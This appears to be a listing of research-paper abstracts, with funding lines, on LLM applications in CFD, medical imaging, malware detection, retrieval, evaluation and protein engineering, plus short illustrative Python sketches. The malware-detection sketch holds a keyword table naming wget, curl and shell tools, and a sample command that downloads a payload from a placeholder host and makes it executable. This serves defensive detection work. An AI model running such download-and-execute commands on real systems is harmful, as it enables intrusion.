Funding: Supported by the National Natural Science Foundation of China (Grant Nos. 52306126, 22350710788, 12432010, 11988102, 92270203) and the Xplore Prize.
Abstract: Configuring computational fluid dynamics (CFD) simulations typically demands extensive domain expertise, limiting broader access. Although large language models (LLMs) have advanced scientific computing, their use in automating CFD workflows remains underdeveloped. We introduce a novel approach centered on domain-specific LLM adaptation. We fine-tune Qwen2.5-7B-Instruct on NL2FOAM, our custom dataset of 28,716 natural language-to-OpenFOAM configuration pairs with chain-of-thought (CoT) annotations, which enables direct translation from natural language descriptions to executable CFD setups. A multi-agent system orchestrates the process, autonomously verifying inputs, generating configurations, running simulations, and correcting errors. Evaluation on a benchmark of 21 diverse flow cases demonstrates state-of-the-art performance, achieving 88.7% solution accuracy and an 82.6% first-attempt success rate. This significantly outperforms larger general-purpose models such as Qwen2.5-72B-Instruct, DeepSeek-R1, and Llama3.3-70B-Instruct, while also requiring fewer correction iterations and maintaining high computational efficiency. The results highlight the critical role of domain-specific adaptation in deploying LLM assistants for complex engineering workflows. Our code and fine-tuned model have been deposited at https://github.com/YYgroup/AutoCFD.
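The generate, run, and correct cycle described in this abstract can be illustrated with a minimal sketch. It is not the authors' implementation: `configure_and_run`, `RunResult`, and the stub `generate` and `run` callables are hypothetical names introduced here, and a real system would call an LLM and an OpenFOAM solver in their place.

```python
from dataclasses import dataclass
from typing import Callable, Optional, Tuple


@dataclass
class RunResult:
    ok: bool   # True when the simulation finished without errors
    log: str   # solver output, fed back to the generator on failure


def configure_and_run(
    description: str,
    generate: Callable[[str, Optional[str]], str],
    run: Callable[[str], RunResult],
    max_corrections: int = 3,
) -> Tuple[str, int]:
    """Generate a configuration, run it, and feed errors back until it succeeds.

    Returns the working configuration and the number of attempts used.
    """
    feedback: Optional[str] = None
    for attempt in range(1, max_corrections + 2):
        config = generate(description, feedback)
        result = run(config)
        if result.ok:
            return config, attempt
        feedback = result.log  # the next attempt sees the error log
    raise RuntimeError("no working configuration within the correction budget")


# Hypothetical stand-ins for the LLM and the solver, for demonstration only.
def demo_generate(description: str, feedback: Optional[str]) -> str:
    return "config-v1" if feedback is None else "config-v2"


def demo_run(config: str) -> RunResult:
    if config == "config-v2":
        return RunResult(ok=True, log="")
    return RunResult(ok=False, log="missing boundary condition")


final_config, attempts = configure_and_run("lid-driven cavity", demo_generate, demo_run)
```

In this toy run the first attempt fails and the second succeeds, so a first-attempt success rate would count this case as a miss while solution accuracy would not.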
Funding: Supported by the National Natural Science Foundation of China Basic Science Center Program for “Multiscale Problems in Nonlinear Mechanics” (Grant No. 11988102) and the National Natural Science Foundation of China (Grant No. 12202451).
Abstract: This paper investigates the capabilities of large language models (LLMs) to leverage, learn, and create knowledge in solving computational fluid dynamics (CFD) problems through three categories of baseline problems. These categories include (1) conventional CFD problems that can be solved using existing numerical methods in LLMs, such as lid-driven cavity flow and the Sod shock tube problem; (2) problems that require new numerical methods beyond those available in LLMs, such as the recently developed Chien-physics-informed neural networks for singularly perturbed convection-diffusion equations; and (3) problems that cannot be solved using existing numerical methods in LLMs, such as the ill-conditioned Hilbert linear algebraic systems. The evaluations indicate that reasoning LLMs overall outperform non-reasoning models in four test cases. Reasoning LLMs perform very well on CFD problems when given tailored prompts, but their current capability for autonomous knowledge exploration and creation needs to be enhanced.
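To show why Hilbert systems are a hard test case, the sketch below solves H x = b with the known solution x = (1, ..., 1), once in floating point and once in exact rational arithmetic. It is an illustration written for this listing, not code from the paper; the function names are made up here, and only the Python standard library is used.

```python
from fractions import Fraction


def hilbert(n, exact=False):
    """Hilbert matrix H[i][j] = 1 / (i + j + 1), as floats or exact Fractions."""
    one = Fraction(1) if exact else 1.0
    return [[one / (i + j + 1) for j in range(n)] for i in range(n)]


def solve(a, b):
    """Gaussian elimination with partial pivoting; works for floats and Fractions."""
    n = len(a)
    m = [row[:] + [rhs] for row, rhs in zip(a, b)]  # augmented matrix
    for col in range(n):
        pivot = max(range(col, n), key=lambda r: abs(m[r][col]))
        m[col], m[pivot] = m[pivot], m[col]
        for r in range(col + 1, n):
            factor = m[r][col] / m[col][col]
            for c in range(col, n + 1):
                m[r][c] -= factor * m[col][c]
    x = [0] * n
    for r in reversed(range(n)):  # back substitution
        s = m[r][n] - sum(m[r][c] * x[c] for c in range(r + 1, n))
        x[r] = s / m[r][r]
    return x


def max_error(n, exact=False):
    """Largest deviation of the computed solution from the true x = (1, ..., 1)."""
    h = hilbert(n, exact)
    b = [sum(row) for row in h]  # right-hand side chosen so that x is all ones
    return max(abs(xi - 1) for xi in solve(h, b))


small_float_error = max_error(3)
large_float_error = max_error(10)
exact_error = max_error(10, exact=True)
```

The floating-point error grows by many orders of magnitude between n = 3 and n = 10, while the rational-arithmetic solve stays exact at the cost of speed. This is why a standard solver alone is not enough for this category of problem.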
Funding: Postdoctoral Fund of China (No. 2003034518); Fund of Health Bureau of Zhejiang Province (No. 2004B042), China.
Abstract: This research studies the process of 3D reconstruction and dynamic concision based on 2D medical digital images using virtual reality modelling language (VRML) and JavaScript, with a focus on how to realize the dynamic concision of 3D medical models with the script node and sensor node in VRML. The 3D reconstruction and concision of internal body organs can be built with higher quality than that obtained from traditional methods. With the function of dynamic concision, the VRML browser can offer better windows for human-computer interaction in a real-time environment than before. 3D reconstruction and dynamic concision with VRML can meet the requirements of medical observation of 3D reconstructions and has promising prospects in medical imaging.
Funding: Supported by the National Key Research and Development Program (Grant No. 2024YFB3312700), the National Natural Science Foundation of China (Grant No. 52405541), and the Changzhou Municipal Sci&Tech Program (Grant No. CJ20241131).
Abstract: Under the paradigm of Industry 5.0, intelligent manufacturing transcends mere efficiency enhancement by emphasizing human-machine collaboration, where human expertise plays a central role in assembly processes. Despite advancements in intelligent and digital technologies, assembly process design still relies heavily on manual knowledge reuse, which causes inefficiencies and inconsistent quality in process documentation. To address these issues, this paper proposes a knowledge push method for complex product assembly process design based on a distillation-model-based dynamically enhanced graph and a Bayesian network. First, an initial knowledge graph is constructed using a BERT-BiLSTM-CRF model trained with integrated human expertise and a fine-tuned large language model. Then, a confidence-based dynamic weighted fusion strategy is employed to achieve dynamic incremental construction of the knowledge graph with low resource consumption. Subsequently, a Bayesian network model is constructed based on the relationships between assembly components, assembly features, and operations. Bayesian network reasoning is used to push assembly process knowledge under different design requirements. Finally, the feasibility of the Bayesian network construction method and the effectiveness of Bayesian network reasoning are verified through a specific example, significantly improving the utilization of assembly process knowledge and the efficiency of assembly process design.
Funding: Supported by the Zhejiang Provincial Natural Science Foundation of China (No. LQ23F030001); the National Natural Science Foundation of China (No. 62406280); the Autism Research Special Fund of Zhejiang Foundation for Disabled Persons (No. 2023008); the Liaoning Province Higher Education Innovative Talents Program Support Project (No. LR2019058); the Liaoning Province Joint Open Fund for Key Scientific and Technological Innovation Bases (No. 2021-KF-12-05); the Central Guidance on Local Science and Technology Development Fund of Liaoning Province (No. 2023JH6/100100066); the Key Laboratory for Biomedical Engineering of Ministry of Education, Zhejiang University, China; and in part by the Open Research Fund of the State Key Laboratory of Cognitive Neuroscience and Learning.
Abstract: Video action recognition (VAR) aims to analyze dynamic behaviors in videos and achieve semantic understanding. VAR faces challenges such as temporal dynamics, action-scene coupling, and the complexity of human interactions. Existing methods can be categorized into motion-level, event-level, and story-level ones based on spatiotemporal granularity. However, single-modal approaches struggle to capture complex behavioral semantics and human factors. Therefore, in recent years, vision-language models (VLMs) have been introduced into this field, providing new research perspectives for VAR. In this paper, we systematically review spatiotemporal hierarchical methods in VAR and explore how the introduction of large models has advanced the field. Additionally, we propose the concept of “Factor” to identify and integrate key information from both visual and textual modalities, enhancing multimodal alignment. We also summarize various multimodal alignment methods and provide in-depth analysis and insights into future research directions.
Abstract: Power generation companies have accumulated vast amounts of specialized data and expert knowledge. However, challenges such as data silos and fragmented knowledge hinder the effective utilization of this information. This study proposes a novel framework for intelligent Question-and-Answer (Q&A) systems based on Retrieval-Augmented Generation (RAG) to address these issues. The system efficiently acquires domain-specific knowledge by leveraging external databases, including Relational Databases (RDBs) and graph databases, without additional fine-tuning of Large Language Models (LLMs). Crucially, the framework integrates a Dynamic Knowledge Base Updating Mechanism (DKBUM) and a Weighted Context-Aware Similarity (WCAS) method to enhance retrieval accuracy and mitigate inherent limitations of LLMs, such as hallucinations and lack of specialization. DKBUM dynamically adjusts knowledge weights within the database, ensuring that the most recent and relevant information is utilized, while WCAS refines the alignment between queries and knowledge items through enhanced context understanding. Experimental validation demonstrates that the system can generate timely, accurate, and context-sensitive responses, making it a robust solution for managing complex business logic in specialized industries.
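One way to picture how a knowledge weight and a similarity score could combine during retrieval is sketched below. The abstract does not give the DKBUM or WCAS formulas, so everything here is an assumption made for illustration: the exponential recency weight, its 30-day half-life, the use of plain cosine similarity, and all names such as `KnowledgeItem` and `retrieve`.

```python
import math
from dataclasses import dataclass
from typing import List


@dataclass
class KnowledgeItem:
    text: str
    embedding: List[float]
    age_days: float  # time since the item was last updated


def cosine(a: List[float], b: List[float]) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def recency_weight(age_days: float, half_life_days: float = 30.0) -> float:
    """Assumed weighting: an item's weight halves every `half_life_days`."""
    return 0.5 ** (age_days / half_life_days)


def retrieve(query: List[float], items: List[KnowledgeItem], top_k: int = 2) -> List[KnowledgeItem]:
    """Rank items by similarity scaled by recency and return the best `top_k`."""
    scored = [(cosine(query, it.embedding) * recency_weight(it.age_days), it) for it in items]
    scored.sort(key=lambda pair: pair[0], reverse=True)
    return [it for _, it in scored[:top_k]]


items = [
    KnowledgeItem("old exact match", [1.0, 0.0], age_days=300.0),
    KnowledgeItem("recent close match", [0.9, 0.1], age_days=0.0),
    KnowledgeItem("recent unrelated", [0.0, 1.0], age_days=0.0),
]
best = retrieve([1.0, 0.0], items, top_k=2)
```

Here the recent close match outranks the stale exact match, which is the behavior the abstract attributes to weighting recent knowledge more heavily.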
Funding: Supported by the National Science and Technology Council under grant number 113-2221-E-027-126-MY3.
Abstract: In recent years, cyber threats have escalated across diverse sectors, with cybercrime syndicates increasingly exploiting system vulnerabilities. Traditional passive defense mechanisms have proven insufficient, particularly as Linux platforms, historically overlooked in favor of Windows, have emerged as frequent targets. According to Trend Micro, there has been a substantial increase in Linux-targeted malware, with ransomware attacks on Linux surpassing those on macOS. This alarming trend underscores the need for detection strategies specifically designed for Linux environments. To address this challenge, this study proposes a comprehensive malware detection framework tailored for Linux systems, integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models (LLMs). Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions. These features are then systematically mapped to the MITRE ATT&CK framework, incorporating its defined data sources, data components, and Tactics, Techniques, and Procedures (TTPs). Two mapping constructs, Conceptual Definition Mapping and TTP Technical Keyword Mapping, are developed from official MITRE documentation. These resources are utilized to fine-tune an LLM, enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques, including those employed by previously unknown malware variants. The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence. Experimental evaluations confirm the efficacy of the proposed system, with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques. This study contributes a fully integrated Linux-specific detection framework, a novel approach for transforming unstructured behavioral data into actionable intelligence, improved interpretability of malicious behavior, and a scalable training process for future applications of LLMs in cybersecurity.
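As a rough picture of what a keyword-to-technique mapping looks like, the sketch below tags sandbox command lines with ATT&CK technique IDs by substring lookup. This is a deliberately simple stand-in, not the study's method, which fine-tunes an LLM on its mapping resources. The keyword table and the function name `map_behaviors` are assumptions made here; the technique IDs themselves are existing ATT&CK entries.

```python
from typing import Dict, List

# Hypothetical keyword table; IDs refer to existing MITRE ATT&CK techniques.
KEYWORD_TO_TECHNIQUE: Dict[str, str] = {
    "crontab": "T1053.003",  # Scheduled Task/Job: Cron
    "wget": "T1105",         # Ingress Tool Transfer
    "curl": "T1105",         # Ingress Tool Transfer
    "chmod": "T1222.002",    # File and Directory Permissions Modification (Linux and Mac)
    "/bin/sh": "T1059.004",  # Command and Scripting Interpreter: Unix Shell
}


def map_behaviors(commands: List[str]) -> Dict[str, List[str]]:
    """Group observed command lines under every technique whose keyword they contain."""
    hits: Dict[str, List[str]] = {}
    for command in commands:
        for keyword, technique in KEYWORD_TO_TECHNIQUE.items():
            if keyword in command:
                hits.setdefault(technique, []).append(command)
    return hits


observed = [
    "wget http://example.invalid/payload -O /tmp/p",
    "chmod +x /tmp/p",
    "crontab -l",
]
techniques = map_behaviors(observed)
```

A lookup like this misses renamed binaries and unfamiliar command patterns, which is the gap the abstract says semantic interpretation by a fine-tuned LLM is meant to close.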
Abstract: This study presents results from sentiment analysis of dynamic message sign (DMS) message content, focusing on messages that include numbers of road fatalities. As a traffic management tool, DMS plays a role in influencing driver behavior and assisting transportation agencies in achieving safe and efficient traffic movement. However, the psychological and behavioral effects of displaying fatality numbers on DMS remain poorly understood; hence, it is important to know the potential impacts of displaying such messages. The Iowa Department of Transportation displays the number of fatalities on a first screen, followed by a supplemental message intended to promote safe driving; an example is “19 TRAFFIC DEATHS THIS YEAR IF YOU HAVE A SUPER BOWL DON’T DRIVE HIGH.” We employ natural language processing to decode the sentiment and undertone of the supplemental message and investigate how they influence driving speeds. According to the results of a mixed-effects model, drivers reduced speeds marginally upon encountering DMS fatality text with a positive sentiment and a neutral undertone. This category had the largest associated speed reduction, while messages with negative sentiment and a negative undertone had the second largest, greater than other combinations, including positive sentiment with a positive undertone.
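Abstract: As large language models (LLMs) are pre-trained on ultra-large-scale corpora, data contamination has become increasingly prominent, directly threatening the accuracy of model performance evaluation. This paper proposes EdEval (equal distribution dynamic evaluation), a dynamic data evaluation method designed to reduce the impact of data contamination on evaluation accuracy. EdEval extracts core knowledge points and main ideas to ensure that the generated evaluation questions are essentially consistent with the static data, and it uses web retrieval to elaborate on the knowledge points, producing evaluation samples backed by high-quality knowledge. In addition, by controlling the number and complexity of questions, EdEval achieves dynamic alignment and flexible adjustment, matching the difficulty level of the static data and meeting the needs of different complexity levels. Based on Bloom's taxonomy, EdEval comprehensively evaluates LLMs along six dimensions: remembering, understanding, applying, analyzing, evaluating, and creating. Experimental results show that EdEval effectively mitigates the impact of data contamination on multiple datasets and significantly improves the fairness and accuracy of evaluation.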
Funding: Supported by the National Natural Science Foundation of China (Grant No. 22478199) and the Jiangsu Basic Research Center for Synthetic Biology (Grant No. BK20233003).
Abstract: Various tools specifically designed to accelerate evolutionary processes for biocatalysis and biotransformation have been developed in the field of protein engineering. Among them, protein language modeling (PLM) is extremely efficient for large-scale screening, thus initiating a new era of accelerated prediction. Therefore, this study considered the highly promising ancestral sequence reconstruction 1 (ASR1)-polyethylene terephthalate hydrolase (PETase), previously obtained via ancestral sequence reconstruction, as a representative model. The PLM Evolutionary Scale Modeling-1V was used as an amino acid optimizer to efficiently identify four beneficial variants that improved terephthalic acid (TPA) yield by 1.7-fold. The triple variant ASR1-HRT (N81H/W120R/V265T) showed a 6.1-fold increase in TPA yield compared with that of the five-site variant FAST-PETase (N233K/R224Q/S121E/D186H/R280A) through the recombination of a single beneficial variant. Moreover, ASR1-HRT achieved a depolymerization rate of 96.1% for commercial polyethylene terephthalate (PET) plastics. Molecular dynamics simulations showed that the enhancement of structural stability at high temperatures and changes in catalytic reactions due to solvation contributed to efficient and stable properties. In addition, through exploring the enzyme-PET film interaction landscape at the molecular level, the two motifs of ASR1-PETase were found to play key roles in the catalytic process at the solid-liquid interface. This enhanced the initial adsorption of the enzyme on PET film, thereby enhancing the hydrolysis performance. Overall, the PLM optimization strategy has the potential to be applied to other enzymes, thereby efficiently accelerating protein engineering.
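Abstract: Continuous relation extraction (CRE) plays a vital role in understanding and adapting to constantly changing data environments. Traditional CRE techniques typically face two major difficulties: the continual evolution of relation patterns, and the risk of forgetting previously learned relations. Although storing and replaying typical examples of old relations has proven effective in reducing forgetting, repeatedly replaying these fixed and limited samples may lead to overfitting. To address this problem, this paper proposes a continuous relation extraction method based on dynamic prototypes. The method combines density-based clustering with a generative large language model to tackle the above challenges, and is named Continuous Relation Extraction with Density based Clustering and Generative Large Language Model (CRE-DCGLLM). Specifically, density-based clustering is used to select memory samples, alleviating the forgetting of previous tasks, and dynamic relation prototypes are designed from both the full sample set and the memory samples. In addition, a generative large language model produces pseudo-samples for the memory samples for use in replay training, addressing the overfitting caused by repeated replay. Focal knowledge distillation is also applied to improve adaptation to changing relation patterns. A series of experiments on the FewRel and TACRED datasets verifies the effectiveness of the method. The results show notable improvements in both the accuracy and efficiency of continuous relation extraction, with particularly strong performance in handling similar relations, preventing knowledge forgetting, and overcoming overfitting.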
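The two ideas of density-based memory selection and a prototype built from both the full sample set and the memory samples can be sketched as follows. The abstract does not specify the clustering algorithm or the prototype formula, so the neighbour-count density, the mixing coefficient `alpha`, and the function names are all assumptions made for this illustration.

```python
import math
from typing import List

Vector = List[float]


def mean(vectors: List[Vector]) -> Vector:
    n = len(vectors)
    return [sum(v[i] for v in vectors) / n for i in range(len(vectors[0]))]


def select_memory(samples: List[Vector], radius: float, k: int) -> List[Vector]:
    """Keep the k samples with the most neighbours within `radius` (the densest ones)."""
    def density(s: Vector) -> int:
        return sum(1 for t in samples if math.dist(s, t) <= radius)
    return sorted(samples, key=density, reverse=True)[:k]


def prototype(samples: List[Vector], memory: List[Vector], alpha: float = 0.5) -> Vector:
    """Assumed form: blend the mean of all samples with the mean of the memory samples."""
    full, mem = mean(samples), mean(memory)
    return [alpha * f + (1 - alpha) * m for f, m in zip(full, mem)]


# Toy embeddings for one relation: three clustered points and one outlier.
samples = [[0.0, 0.0], [0.1, 0.0], [0.0, 0.1], [5.0, 5.0]]
memory = select_memory(samples, radius=0.5, k=2)
proto = prototype(samples, memory)
```

The outlier is never chosen as a memory sample, so the blended prototype sits closer to the dense cluster than the plain mean of all samples does.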